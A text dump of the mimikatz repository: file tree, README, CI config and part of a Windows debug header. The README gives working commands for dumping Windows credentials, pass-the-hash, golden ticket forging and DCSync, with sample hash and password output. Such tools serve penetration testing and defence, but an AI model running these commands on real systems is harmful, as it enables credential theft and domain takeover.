Copy disabled (too large)
Download .txt
Showing preview only (11,842K chars total). Download the full file to get everything.
Repository: gentilkiwi/mimikatz
Branch: master
Commit: 152b208916c2
Files: 361
Total size: 11.2 MB
Directory structure:
gitextract_p7jg2v3b/
├── README.md
├── appveyor.yml
├── inc/
│ ├── DbgHelp.h
│ ├── DhcpSSdk.h
│ ├── DsGetDC.h
│ ├── Fci.h
│ ├── Midles.h
│ ├── NTSecPKG.h
│ ├── PshPack8.h
│ ├── SubAuth.h
│ ├── WDBGEXTS.H
│ ├── WinBer.h
│ ├── WinDNS.h
│ ├── Winldap.h
│ ├── cardmod.h
│ ├── fltUser.h
│ ├── fltUserStructures.h
│ ├── globals.h
│ ├── msasn1.h
│ ├── schannel.h
│ ├── schnlsp.h
│ └── wincred.h
├── kiwi_passwords.yar
├── lib/
│ ├── Win32/
│ │ ├── advapi32.hash.lib
│ │ ├── bcrypt.lib
│ │ ├── cryptdll.lib
│ │ ├── fltlib.lib
│ │ ├── hid.lib
│ │ ├── msasn1.min.lib
│ │ ├── ncrypt.lib
│ │ ├── netapi32.min.lib
│ │ ├── ntdll.min.lib
│ │ ├── samlib.lib
│ │ └── winsta.lib
│ ├── arm64/
│ │ ├── advapi32.hash.lib
│ │ ├── msasn1.min.lib
│ │ ├── netapi32.min.lib
│ │ └── ntdll.min.lib
│ └── x64/
│ ├── advapi32.hash.lib
│ ├── bcrypt.lib
│ ├── cryptdll.lib
│ ├── fltlib.lib
│ ├── hid.lib
│ ├── msasn1.min.lib
│ ├── ncrypt.lib
│ ├── netapi32.min.lib
│ ├── ntdll.min.lib
│ ├── samlib.lib
│ └── winsta.lib
├── mimicom.idl
├── mimidrv/
│ ├── MAKEFILE
│ ├── SOURCES
│ ├── _build_.cmd
│ ├── _clean_.cmd
│ ├── _rebuild_.cmd
│ ├── globals.h
│ ├── ioctl.h
│ ├── kkll_m_filters.c
│ ├── kkll_m_filters.h
│ ├── kkll_m_memory.c
│ ├── kkll_m_memory.h
│ ├── kkll_m_modules.c
│ ├── kkll_m_modules.h
│ ├── kkll_m_notify.c
│ ├── kkll_m_notify.h
│ ├── kkll_m_process.c
│ ├── kkll_m_process.h
│ ├── kkll_m_ssdt.c
│ ├── kkll_m_ssdt.h
│ ├── mimidrv.c
│ ├── mimidrv.h
│ ├── mimidrv.rc
│ ├── mimidrv.vcxproj
│ └── mimidrv.vcxproj.filters
├── mimikatz/
│ ├── mimikatz.c
│ ├── mimikatz.h
│ ├── mimikatz.rc
│ ├── mimikatz.vcxproj
│ ├── mimikatz.vcxproj.filters
│ └── modules/
│ ├── crypto/
│ │ ├── kuhl_m_crypto_extractor.c
│ │ ├── kuhl_m_crypto_extractor.h
│ │ ├── kuhl_m_crypto_patch.c
│ │ ├── kuhl_m_crypto_patch.h
│ │ ├── kuhl_m_crypto_pki.c
│ │ ├── kuhl_m_crypto_pki.h
│ │ ├── kuhl_m_crypto_sc.c
│ │ └── kuhl_m_crypto_sc.h
│ ├── dpapi/
│ │ ├── kuhl_m_dpapi.c
│ │ ├── kuhl_m_dpapi.h
│ │ ├── kuhl_m_dpapi_oe.c
│ │ ├── kuhl_m_dpapi_oe.h
│ │ └── packages/
│ │ ├── kuhl_m_dpapi_chrome.c
│ │ ├── kuhl_m_dpapi_chrome.h
│ │ ├── kuhl_m_dpapi_citrix.c
│ │ ├── kuhl_m_dpapi_citrix.h
│ │ ├── kuhl_m_dpapi_cloudap.c
│ │ ├── kuhl_m_dpapi_cloudap.h
│ │ ├── kuhl_m_dpapi_creds.c
│ │ ├── kuhl_m_dpapi_creds.h
│ │ ├── kuhl_m_dpapi_keys.c
│ │ ├── kuhl_m_dpapi_keys.h
│ │ ├── kuhl_m_dpapi_lunahsm.c
│ │ ├── kuhl_m_dpapi_lunahsm.h
│ │ ├── kuhl_m_dpapi_powershell.c
│ │ ├── kuhl_m_dpapi_powershell.h
│ │ ├── kuhl_m_dpapi_rdg.c
│ │ ├── kuhl_m_dpapi_rdg.h
│ │ ├── kuhl_m_dpapi_sccm.c
│ │ ├── kuhl_m_dpapi_sccm.h
│ │ ├── kuhl_m_dpapi_ssh.c
│ │ ├── kuhl_m_dpapi_ssh.h
│ │ ├── kuhl_m_dpapi_wlan.c
│ │ └── kuhl_m_dpapi_wlan.h
│ ├── kerberos/
│ │ ├── kuhl_m_kerberos.c
│ │ ├── kuhl_m_kerberos.h
│ │ ├── kuhl_m_kerberos_ccache.c
│ │ ├── kuhl_m_kerberos_ccache.h
│ │ ├── kuhl_m_kerberos_claims.c
│ │ ├── kuhl_m_kerberos_claims.h
│ │ ├── kuhl_m_kerberos_pac.c
│ │ ├── kuhl_m_kerberos_pac.h
│ │ ├── kuhl_m_kerberos_ticket.c
│ │ └── kuhl_m_kerberos_ticket.h
│ ├── kuhl_m.h
│ ├── kuhl_m_acr.c
│ ├── kuhl_m_acr.h
│ ├── kuhl_m_busylight.c
│ ├── kuhl_m_busylight.h
│ ├── kuhl_m_crypto.c
│ ├── kuhl_m_crypto.h
│ ├── kuhl_m_dpapi.c
│ ├── kuhl_m_dpapi.h
│ ├── kuhl_m_event.c
│ ├── kuhl_m_event.h
│ ├── kuhl_m_iis.c
│ ├── kuhl_m_iis.h
│ ├── kuhl_m_kernel.c
│ ├── kuhl_m_kernel.h
│ ├── kuhl_m_lsadump.c
│ ├── kuhl_m_lsadump.h
│ ├── kuhl_m_lsadump_remote.c
│ ├── kuhl_m_lsadump_remote.h
│ ├── kuhl_m_minesweeper.c
│ ├── kuhl_m_minesweeper.h
│ ├── kuhl_m_misc.c
│ ├── kuhl_m_misc.h
│ ├── kuhl_m_net.c
│ ├── kuhl_m_net.h
│ ├── kuhl_m_privilege.c
│ ├── kuhl_m_privilege.h
│ ├── kuhl_m_process.c
│ ├── kuhl_m_process.h
│ ├── kuhl_m_rdm.c
│ ├── kuhl_m_rdm.h
│ ├── kuhl_m_rpc.c
│ ├── kuhl_m_rpc.h
│ ├── kuhl_m_service.c
│ ├── kuhl_m_service.h
│ ├── kuhl_m_service_remote.c
│ ├── kuhl_m_service_remote.h
│ ├── kuhl_m_sid.c
│ ├── kuhl_m_sid.h
│ ├── kuhl_m_sr98.c
│ ├── kuhl_m_sr98.h
│ ├── kuhl_m_standard.c
│ ├── kuhl_m_standard.h
│ ├── kuhl_m_sysenvvalue.c
│ ├── kuhl_m_sysenvvalue.h
│ ├── kuhl_m_token.c
│ ├── kuhl_m_token.h
│ ├── kuhl_m_ts.c
│ ├── kuhl_m_ts.h
│ ├── kuhl_m_vault.c
│ ├── kuhl_m_vault.h
│ ├── lsadump/
│ │ ├── kuhl_m_lsadump_dc.c
│ │ └── kuhl_m_lsadump_dc.h
│ ├── misc/
│ │ ├── kuhl_m_misc_citrix.c
│ │ ├── kuhl_m_misc_citrix.h
│ │ ├── kuhl_m_misc_djoin.c
│ │ └── kuhl_m_misc_djoin.h
│ ├── ngc/
│ │ ├── kuhl_m_ngc.c
│ │ └── kuhl_m_ngc.h
│ └── sekurlsa/
│ ├── crypto/
│ │ ├── kuhl_m_sekurlsa_nt5.c
│ │ ├── kuhl_m_sekurlsa_nt5.h
│ │ ├── kuhl_m_sekurlsa_nt6.c
│ │ └── kuhl_m_sekurlsa_nt6.h
│ ├── globals_sekurlsa.h
│ ├── kuhl_m_sekurlsa.c
│ ├── kuhl_m_sekurlsa.h
│ ├── kuhl_m_sekurlsa_sk.c
│ ├── kuhl_m_sekurlsa_sk.h
│ ├── kuhl_m_sekurlsa_utils.c
│ ├── kuhl_m_sekurlsa_utils.h
│ └── packages/
│ ├── kuhl_m_sekurlsa_cloudap.c
│ ├── kuhl_m_sekurlsa_cloudap.h
│ ├── kuhl_m_sekurlsa_credman.c
│ ├── kuhl_m_sekurlsa_credman.h
│ ├── kuhl_m_sekurlsa_dpapi.c
│ ├── kuhl_m_sekurlsa_dpapi.h
│ ├── kuhl_m_sekurlsa_kerberos.c
│ ├── kuhl_m_sekurlsa_kerberos.h
│ ├── kuhl_m_sekurlsa_livessp.c
│ ├── kuhl_m_sekurlsa_livessp.h
│ ├── kuhl_m_sekurlsa_msv1_0.c
│ ├── kuhl_m_sekurlsa_msv1_0.h
│ ├── kuhl_m_sekurlsa_ssp.c
│ ├── kuhl_m_sekurlsa_ssp.h
│ ├── kuhl_m_sekurlsa_tspkg.c
│ ├── kuhl_m_sekurlsa_tspkg.h
│ ├── kuhl_m_sekurlsa_wdigest.c
│ └── kuhl_m_sekurlsa_wdigest.h
├── mimikatz.sln
├── mimilib/
│ ├── kappfree.c
│ ├── kcredentialprovider.c
│ ├── kcredentialprovider.h
│ ├── kdhcp.c
│ ├── kdhcp.h
│ ├── kdns.c
│ ├── kdns.h
│ ├── kfilt.c
│ ├── kfilt.h
│ ├── knp.c
│ ├── knp.h
│ ├── kssp.c
│ ├── kssp.h
│ ├── ksub.c
│ ├── ksub.h
│ ├── mimilib.def
│ ├── mimilib.rc
│ ├── mimilib.vcxproj
│ ├── mimilib.vcxproj.filters
│ ├── sekurlsadbg/
│ │ ├── kuhl_m_sekurlsa_nt6.c
│ │ ├── kuhl_m_sekurlsa_nt6.h
│ │ ├── kuhl_m_sekurlsa_packages.c
│ │ ├── kuhl_m_sekurlsa_packages.h
│ │ ├── kuhl_m_sekurlsa_utils.c
│ │ ├── kuhl_m_sekurlsa_utils.h
│ │ ├── kull_m_rpc.c
│ │ ├── kull_m_rpc.h
│ │ ├── kull_m_rpc_ms-credentialkeys.c
│ │ ├── kull_m_rpc_ms-credentialkeys.h
│ │ ├── kwindbg.c
│ │ └── kwindbg.h
│ ├── utils.c
│ └── utils.h
├── mimilove/
│ ├── mimilove.c
│ ├── mimilove.h
│ ├── mimilove.rc
│ ├── mimilove.vcxproj
│ └── mimilove.vcxproj.filters
├── mimispool/
│ ├── README.md
│ ├── mimispool.c
│ ├── mimispool.def
│ ├── mimispool.h
│ ├── mimispool.rc
│ ├── mimispool.vcxproj
│ └── mimispool.vcxproj.filters
├── modules/
│ ├── kull_m_acr.c
│ ├── kull_m_acr.h
│ ├── kull_m_asn1.c
│ ├── kull_m_asn1.h
│ ├── kull_m_busylight.c
│ ├── kull_m_busylight.h
│ ├── kull_m_cabinet.c
│ ├── kull_m_cabinet.h
│ ├── kull_m_cred.c
│ ├── kull_m_cred.h
│ ├── kull_m_crypto.c
│ ├── kull_m_crypto.h
│ ├── kull_m_crypto_ngc.c
│ ├── kull_m_crypto_ngc.h
│ ├── kull_m_crypto_remote.c
│ ├── kull_m_crypto_remote.h
│ ├── kull_m_crypto_sk.c
│ ├── kull_m_crypto_sk.h
│ ├── kull_m_crypto_system.h
│ ├── kull_m_dpapi.c
│ ├── kull_m_dpapi.h
│ ├── kull_m_file.c
│ ├── kull_m_file.h
│ ├── kull_m_handle.c
│ ├── kull_m_handle.h
│ ├── kull_m_hid.c
│ ├── kull_m_hid.h
│ ├── kull_m_kernel.c
│ ├── kull_m_kernel.h
│ ├── kull_m_key.c
│ ├── kull_m_key.h
│ ├── kull_m_ldap.c
│ ├── kull_m_ldap.h
│ ├── kull_m_memory.c
│ ├── kull_m_memory.h
│ ├── kull_m_mifare.h
│ ├── kull_m_minidump.c
│ ├── kull_m_minidump.h
│ ├── kull_m_net.c
│ ├── kull_m_net.h
│ ├── kull_m_output.c
│ ├── kull_m_output.h
│ ├── kull_m_patch.c
│ ├── kull_m_patch.h
│ ├── kull_m_pipe.c
│ ├── kull_m_pipe.h
│ ├── kull_m_pn532.c
│ ├── kull_m_pn532.h
│ ├── kull_m_process.c
│ ├── kull_m_process.h
│ ├── kull_m_rdm.c
│ ├── kull_m_rdm.h
│ ├── kull_m_registry.c
│ ├── kull_m_registry.h
│ ├── kull_m_registry_structures.h
│ ├── kull_m_remotelib.c
│ ├── kull_m_remotelib.h
│ ├── kull_m_samlib.h
│ ├── kull_m_service.c
│ ├── kull_m_service.h
│ ├── kull_m_sr98.c
│ ├── kull_m_sr98.h
│ ├── kull_m_string.c
│ ├── kull_m_string.h
│ ├── kull_m_token.c
│ ├── kull_m_token.h
│ ├── kull_m_xml.c
│ ├── kull_m_xml.h
│ ├── rpc/
│ │ ├── kull_m_rpc.c
│ │ ├── kull_m_rpc.h
│ │ ├── kull_m_rpc_bkrp.c
│ │ ├── kull_m_rpc_bkrp.h
│ │ ├── kull_m_rpc_dpapi-entries.c
│ │ ├── kull_m_rpc_dpapi-entries.h
│ │ ├── kull_m_rpc_drsr.c
│ │ ├── kull_m_rpc_drsr.h
│ │ ├── kull_m_rpc_mimicom.c
│ │ ├── kull_m_rpc_mimicom.h
│ │ ├── kull_m_rpc_ms-bkrp.h
│ │ ├── kull_m_rpc_ms-bkrp_c.c
│ │ ├── kull_m_rpc_ms-claims.c
│ │ ├── kull_m_rpc_ms-claims.h
│ │ ├── kull_m_rpc_ms-credentialkeys.c
│ │ ├── kull_m_rpc_ms-credentialkeys.h
│ │ ├── kull_m_rpc_ms-dcom_IObjectExporter.h
│ │ ├── kull_m_rpc_ms-dcom_IObjectExporter_c.c
│ │ ├── kull_m_rpc_ms-drsr.h
│ │ ├── kull_m_rpc_ms-drsr_c.c
│ │ ├── kull_m_rpc_ms-efsr.h
│ │ ├── kull_m_rpc_ms-efsr_c.c
│ │ ├── kull_m_rpc_ms-nrpc.h
│ │ ├── kull_m_rpc_ms-nrpc_c.c
│ │ ├── kull_m_rpc_ms-odj.c
│ │ ├── kull_m_rpc_ms-odj.h
│ │ ├── kull_m_rpc_ms-pac.c
│ │ ├── kull_m_rpc_ms-pac.h
│ │ ├── kull_m_rpc_ms-par.h
│ │ ├── kull_m_rpc_ms-par_c.c
│ │ ├── kull_m_rpc_ms-rprn.c
│ │ └── kull_m_rpc_ms-rprn.h
│ ├── sqlite3.c
│ └── sqlite3.h
├── notrunk.lst
└── trunk.lst
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# mimikatz
**`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security.
It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.
```
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
```
But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on https://blog.gentilkiwi.com (in French, _yes_).
If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases
## Quick usage
```
log
privilege::debug
```
### sekurlsa
```
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
```
### kerberos
```
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
```
### crypto
```
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
```
### vault & lsadump
```
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
```
## Build
`mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
* for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http://www.microsoft.com/download/details.aspx?id=44914)
* _for `mimikatz driver`, `mimilove` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_
`mimikatz` uses `SVN` for source control, but is now available with `GIT` too!
You can use any tools you want to sync, even incorporated `GIT` in Visual Studio 2013 =)
### Synchronize!
* GIT URL is : https://github.com/gentilkiwi/mimikatz.git
* SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk
* ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip
### Build the solution
* After opening the solution, `Build` / `Build Solution` (you can change architecture)
* `mimikatz` is now built and ready to be used! (`Win32` / `x64` even `ARM64` if you're lucky)
* you can have error `MSB3073` about `_build_.cmd` and `mimidrv`, it's because the driver cannot be build without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK.
### ddk2003
With this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies)
For this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
Follow instructions:
* https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
* _https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_
## Continuous Integration
`mimikatz` project is available on AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz
Its status is: 
## Licence
CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/
`mimikatz` needs coffee to be developed:
* PayPal: https://www.paypal.me/delpy/
## Author
* Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
* DCSync and DCShadow functions in `lsadump` module were co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )
This is a **personal** development, please respect its philosophy and don't use it for bad things!
================================================
FILE: appveyor.yml
================================================
version: 2.2.0-ci-{branch}-{build}
image: Visual Studio 2013
configuration: Release
platform:
- x64
- Win32
shallow_clone: true
before_build:
- ps: (Get-Content "C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Include\ntsecapi.h") | %{$_ -replace "^RtlDecryptMemory\($", "__stdcall RtlDecryptMemory("} | Set-Content "C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Include\ntsecapi.h"
build:
parallel: true
verbosity: normal
after_build:
- cmd: >-
7z a -t7z -mx -ms=on %APPVEYOR_PROJECT_NAME%_trunk_%PLATFORM%.7z -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
7z a -tzip -mx -mm=deflate -mpass=15 %APPVEYOR_PROJECT_NAME%_trunk_%PLATFORM%.zip -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
7z a -p%APPVEYOR_PROJECT_NAME% -mhe=on -t7z -mx -ms=on %APPVEYOR_PROJECT_NAME%_trunk_password_%PLATFORM%.7z -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
7z a -p%APPVEYOR_PROJECT_NAME% -tzip -mx -mm=deflate -mpass=15 %APPVEYOR_PROJECT_NAME%_trunk_password_%PLATFORM%.zip -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
artifacts:
- path: mimikatz_trunk_*
================================================
FILE: inc/DbgHelp.h
================================================
/*++ BUILD Version: 0000 Increment this if a change has global effects
Copyright (c) Microsoft Corporation. All rights reserved.
Module Name:
dbghelp.h
Abstract:
This module defines the prototypes and constants required for the image
help routines.
Contains debugging support routines that are redistributable.
Revision History:
--*/
#ifndef _DBGHELP_
#define _DBGHELP_
#if _MSC_VER > 1020
#pragma once
#endif
// As a general principal always call the 64 bit version
// of every API, if a choice exists. The 64 bit version
// works great on 32 bit platforms, and is forward
// compatible to 64 bit platforms.
#ifdef _WIN64
#ifndef _IMAGEHLP64
#define _IMAGEHLP64
#endif
#endif
#include <pshpack8.h>
// For those without specstrings.h
// Since there are different versions of this header, I need to
// individually test each item and define it if it is not around.
#ifndef __in
#define __in
#endif
#ifndef __out
#define __out
#endif
#ifndef __inout
#define __inout
#endif
#ifndef __in_opt
#define __in_opt
#endif
#ifndef __out_opt
#define __out_opt
#endif
#ifndef __inout_opt
#define __inout_opt
#endif
#ifndef __in_ecount
#define __in_ecount(x)
#endif
#ifndef __out_ecount
#define __out_ecount(x)
#endif
#ifndef __inout_ecount
#define __inout_ecount(x)
#endif
#ifndef __in_bcount
#define __in_bcount(x)
#endif
#ifndef __out_bcount
#define __out_bcount(x)
#endif
#ifndef __inout_bcount
#define __inout_bcount(x)
#endif
#ifndef __out_xcount
#define __out_xcount(x)
#endif
#ifndef __deref_opt_out
#define __deref_opt_out
#endif
#ifndef __deref_out
#define __deref_out
#endif
#ifndef __out_ecount_opt
#define __out_ecount_opt(x)
#endif
#ifndef __in_bcount_opt
#define __in_bcount_opt(x)
#endif
#ifndef __out_bcount_opt
#define __out_bcount_opt(x)
#endif
#ifndef __deref_out_opt
#define __deref_out_opt
#endif
#ifdef __cplusplus
extern "C" {
#endif
#ifdef _IMAGEHLP_SOURCE_
#define IMAGEAPI __stdcall
#define DBHLP_DEPRECIATED
#else
#define IMAGEAPI DECLSPEC_IMPORT __stdcall
#if (_MSC_VER >= 1300) && !defined(MIDL_PASS)
#define DBHLP_DEPRECIATED __declspec(deprecated)
#else
#define DBHLP_DEPRECIATED
#endif
#endif
#define DBHLPAPI IMAGEAPI
#define IMAGE_SEPARATION (64*1024)
// Observant readers may notice that 2 new fields,
// 'fReadOnly' and 'Version' have been added to
// the LOADED_IMAGE structure after 'fDOSImage'.
// This does not change the size of the structure
// from previous headers. That is because while
// 'fDOSImage' is a byte, it is padded by the
// compiler to 4 bytes. So the 2 new fields are
// slipped into the extra space.
typedef struct _LOADED_IMAGE {
PSTR ModuleName;
HANDLE hFile;
PUCHAR MappedAddress;
#ifdef _IMAGEHLP64
PIMAGE_NT_HEADERS64 FileHeader;
#else
PIMAGE_NT_HEADERS32 FileHeader;
#endif
PIMAGE_SECTION_HEADER LastRvaSection;
ULONG NumberOfSections;
PIMAGE_SECTION_HEADER Sections;
ULONG Characteristics;
BOOLEAN fSystemImage;
BOOLEAN fDOSImage;
BOOLEAN fReadOnly;
UCHAR Version;
LIST_ENTRY Links;
ULONG SizeOfImage;
} LOADED_IMAGE, *PLOADED_IMAGE;
#define MAX_SYM_NAME 2000
// Error codes set by dbghelp functions. Call GetLastError
// to see them.
// Dbghelp also sets error codes found in winerror.h
#define ERROR_IMAGE_NOT_STRIPPED 0x8800 // the image is not stripped. No dbg file available.
#define ERROR_NO_DBG_POINTER 0x8801 // image is stripped but there is no pointer to a dbg file
#define ERROR_NO_PDB_POINTER 0x8802 // image does not point to a pdb file
typedef BOOL
(CALLBACK *PFIND_DEBUG_FILE_CALLBACK)(
__in HANDLE FileHandle,
__in PCSTR FileName,
__in PVOID CallerData
);
HANDLE
IMAGEAPI
SymFindDebugInfoFile(
__in HANDLE hProcess,
__in PCSTR FileName,
__out_ecount(MAX_PATH + 1) PSTR DebugFilePath,
__in_opt PFIND_DEBUG_FILE_CALLBACK Callback,
__in_opt PVOID CallerData
);
typedef BOOL
(CALLBACK *PFIND_DEBUG_FILE_CALLBACKW)(
__in HANDLE FileHandle,
__in PCWSTR FileName,
__in PVOID CallerData
);
HANDLE
IMAGEAPI
SymFindDebugInfoFileW(
__in HANDLE hProcess,
__in PCWSTR FileName,
__out_ecount(MAX_PATH + 1) PWSTR DebugFilePath,
__in_opt PFIND_DEBUG_FILE_CALLBACKW Callback,
__in_opt PVOID CallerData
);
HANDLE
IMAGEAPI
FindDebugInfoFile (
__in PCSTR FileName,
__in PCSTR SymbolPath,
__out_ecount(MAX_PATH + 1) PSTR DebugFilePath
);
HANDLE
IMAGEAPI
FindDebugInfoFileEx (
__in PCSTR FileName,
__in PCSTR SymbolPath,
__out_ecount(MAX_PATH + 1) PSTR DebugFilePath,
__in_opt PFIND_DEBUG_FILE_CALLBACK Callback,
__in_opt PVOID CallerData
);
HANDLE
IMAGEAPI
FindDebugInfoFileExW (
__in PCWSTR FileName,
__in PCWSTR SymbolPath,
__out_ecount(MAX_PATH + 1) PWSTR DebugFilePath,
__in_opt PFIND_DEBUG_FILE_CALLBACKW Callback,
__in_opt PVOID CallerData
);
typedef BOOL
(CALLBACK *PFINDFILEINPATHCALLBACK)(
__in PCSTR filename,
__in PVOID context
);
BOOL
IMAGEAPI
SymFindFileInPath(
__in HANDLE hprocess,
__in_opt PCSTR SearchPath,
__in PCSTR FileName,
__in_opt PVOID id,
__in DWORD two,
__in DWORD three,
__in DWORD flags,
__out_ecount(MAX_PATH + 1) PSTR FoundFile,
__in_opt PFINDFILEINPATHCALLBACK callback,
__in_opt PVOID context
);
typedef BOOL
(CALLBACK *PFINDFILEINPATHCALLBACKW)(
__in PCWSTR filename,
__in PVOID context
);
BOOL
IMAGEAPI
SymFindFileInPathW(
__in HANDLE hprocess,
__in_opt PCWSTR SearchPath,
__in PCWSTR FileName,
__in_opt PVOID id,
__in DWORD two,
__in DWORD three,
__in DWORD flags,
__out_ecount(MAX_PATH + 1) PWSTR FoundFile,
__in_opt PFINDFILEINPATHCALLBACKW callback,
__in_opt PVOID context
);
typedef BOOL
(CALLBACK *PFIND_EXE_FILE_CALLBACK)(
__in HANDLE FileHandle,
__in PCSTR FileName,
__in_opt PVOID CallerData
);
HANDLE
IMAGEAPI
SymFindExecutableImage(
__in HANDLE hProcess,
__in PCSTR FileName,
__out_ecount(MAX_PATH + 1) PSTR ImageFilePath,
__in PFIND_EXE_FILE_CALLBACK Callback,
__in PVOID CallerData
);
typedef BOOL
(CALLBACK *PFIND_EXE_FILE_CALLBACKW)(
__in HANDLE FileHandle,
__in PCWSTR FileName,
__in_opt PVOID CallerData
);
HANDLE
IMAGEAPI
SymFindExecutableImageW(
__in HANDLE hProcess,
__in PCWSTR FileName,
__out_ecount(MAX_PATH + 1) PWSTR ImageFilePath,
__in PFIND_EXE_FILE_CALLBACKW Callback,
__in PVOID CallerData
);
HANDLE
IMAGEAPI
FindExecutableImage(
__in PCSTR FileName,
__in PCSTR SymbolPath,
__out_ecount(MAX_PATH + 1) PSTR ImageFilePath
);
HANDLE
IMAGEAPI
FindExecutableImageEx(
__in PCSTR FileName,
__in PCSTR SymbolPath,
__out_ecount(MAX_PATH + 1) PSTR ImageFilePath,
__in_opt PFIND_EXE_FILE_CALLBACK Callback,
__in_opt PVOID CallerData
);
HANDLE
IMAGEAPI
FindExecutableImageExW(
__in PCWSTR FileName,
__in PCWSTR SymbolPath,
__out_ecount(MAX_PATH + 1) PWSTR ImageFilePath,
__in_opt PFIND_EXE_FILE_CALLBACKW Callback,
__in PVOID CallerData
);
PIMAGE_NT_HEADERS
IMAGEAPI
ImageNtHeader (
__in PVOID Base
);
PVOID
IMAGEAPI
ImageDirectoryEntryToDataEx (
__in PVOID Base,
__in BOOLEAN MappedAsImage,
__in USHORT DirectoryEntry,
__out PULONG Size,
__out_opt PIMAGE_SECTION_HEADER *FoundHeader
);
PVOID
IMAGEAPI
ImageDirectoryEntryToData (
__in PVOID Base,
__in BOOLEAN MappedAsImage,
__in USHORT DirectoryEntry,
__out PULONG Size
);
PIMAGE_SECTION_HEADER
IMAGEAPI
ImageRvaToSection(
__in PIMAGE_NT_HEADERS NtHeaders,
__in PVOID Base,
__in ULONG Rva
);
PVOID
IMAGEAPI
ImageRvaToVa(
__in PIMAGE_NT_HEADERS NtHeaders,
__in PVOID Base,
__in ULONG Rva,
__in_opt OUT PIMAGE_SECTION_HEADER *LastRvaSection
);
#ifndef _WIN64
// This api won't be ported to Win64 - Fix your code.
typedef struct _IMAGE_DEBUG_INFORMATION {
LIST_ENTRY List;
DWORD ReservedSize;
PVOID ReservedMappedBase;
USHORT ReservedMachine;
USHORT ReservedCharacteristics;
DWORD ReservedCheckSum;
DWORD ImageBase;
DWORD SizeOfImage;
DWORD ReservedNumberOfSections;
PIMAGE_SECTION_HEADER ReservedSections;
DWORD ReservedExportedNamesSize;
PSTR ReservedExportedNames;
DWORD ReservedNumberOfFunctionTableEntries;
PIMAGE_FUNCTION_ENTRY ReservedFunctionTableEntries;
DWORD ReservedLowestFunctionStartingAddress;
DWORD ReservedHighestFunctionEndingAddress;
DWORD ReservedNumberOfFpoTableEntries;
PFPO_DATA ReservedFpoTableEntries;
DWORD SizeOfCoffSymbols;
PIMAGE_COFF_SYMBOLS_HEADER CoffSymbols;
DWORD ReservedSizeOfCodeViewSymbols;
PVOID ReservedCodeViewSymbols;
PSTR ImageFilePath;
PSTR ImageFileName;
PSTR ReservedDebugFilePath;
DWORD ReservedTimeDateStamp;
BOOL ReservedRomImage;
PIMAGE_DEBUG_DIRECTORY ReservedDebugDirectory;
DWORD ReservedNumberOfDebugDirectories;
DWORD ReservedOriginalFunctionTableBaseAddress;
DWORD Reserved[ 2 ];
} IMAGE_DEBUG_INFORMATION, *PIMAGE_DEBUG_INFORMATION;
PIMAGE_DEBUG_INFORMATION
IMAGEAPI
MapDebugInformation(
__in_opt HANDLE FileHandle,
__in PCSTR FileName,
__in_opt PCSTR SymbolPath,
